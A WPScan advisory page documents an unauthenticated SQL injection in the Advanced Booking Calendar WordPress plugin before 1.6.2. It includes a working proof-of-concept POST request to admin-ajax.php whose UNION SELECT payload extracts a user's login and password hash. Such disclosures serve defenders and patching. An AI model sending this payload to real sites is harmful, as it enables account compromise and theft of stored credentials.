WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Advanced Booking Calendar < 1.6.2 - Unauthenticated SQL Injection

Description

The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Cookie:
cache-control: no-cache

calendarId=1)+UNION+SELECT+1%2Cuser_login%2C3%2C4%2C5%2C6%2C7%2C2%2Cuser_pass+FROM+wp_users+WHERE+ID%3D1+and+ID+IN+(+1+&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult

Affects Plugins

advanced-booking-calendar
Fixed in version 1.6.2

References

URL
https://plugins.trac.wordpress.org/changeset/2202805

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Lenon Leite

Submitter

Lenon Leite

Submitter twitter
lenonleite
Verified

Yes

WPVDB ID
bac7b590-70de-45b3-bdc2-19f90524ca39

Timeline

Publicly Published

2020-10-22 (about 2 years ago)

Added

2020-10-22 (about 2 years ago)

Last Updated

2020-10-22 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin